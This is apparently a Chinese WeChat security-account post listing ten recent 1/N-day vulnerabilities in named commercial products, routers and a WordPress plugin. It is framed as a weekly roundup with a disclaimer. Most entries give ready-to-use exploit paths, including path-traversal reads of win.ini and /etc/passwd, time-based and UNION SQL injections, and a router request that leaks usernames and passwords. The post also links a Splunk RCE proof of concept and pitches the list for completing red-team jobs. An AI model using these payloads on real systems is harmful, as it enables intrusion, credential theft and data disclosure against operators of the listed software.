声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
漏洞汇总系列第三期
经团队多次沟通一致决定在合法合规的前提下,每周发布部分收录的通用组件1、N Day来进行公众号及团队宣传。
自2019年至今,团队内部漏洞库数量已达4000+。
自动化漏洞实时收录1、Nday的来源不仅限于博客、各大安全平台、微信、Github、小蓝鸟等。漏洞库中近百0day,则由十余名头部厂商实验室、红队成员资源共享而来。
愿关注猫蛋儿的你,每周都能最高效率地吸收最新漏洞。祝你"学有所成,不负韶华",每次项目都能通过学到的漏洞完成项目,卷过别人保住自己不被裁员!
0x00 漏洞列表
2023年11月13-19号部分漏洞简要信息如下,后台回复“漏洞汇总”获取完整POC数据包。
1.脸爱云 一脸通智慧管理平台权限绕过 (CVE-2023-6099)
/SystemMng.ashx2.好视通视频平台默认口令+任意文件下载
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini3.Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞
/cgi-bin/admin.cgi?Command=getUsernamePassword4.捷诚管理信息系统CWSFinanceCommon SQL注入
/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx5.浙大恩特客户资源管理系统 SQL注入漏洞
/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1%27;WAITFOR+DELAY+%270:0:5%27%2d%2d6.H3C网络管理系统任意文件读取漏洞
/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down7.wordPress plugin AWP Classifieds插件 admin-ajax.php SQL注入
/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login%60+FROM+wp_users+UNION+ALL+SELECT+md5(123);--+-8.广州图创图书馆集群管理系统存在逻辑绕过
/interlib/common/SSOServlet?9.Tosei 自助洗衣机 network_test.php 远程命令执行
/cgi-bin/network_test.php10.Splunk RCE(CVE-2023-46214)
https://github.com/nathan31337/Splunk-RCE-poc完整漏洞列表见下图
关于我们
漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞
现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【漏洞汇总】2023.11.20-11.26 1/N Day漏洞汇总【第三期】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论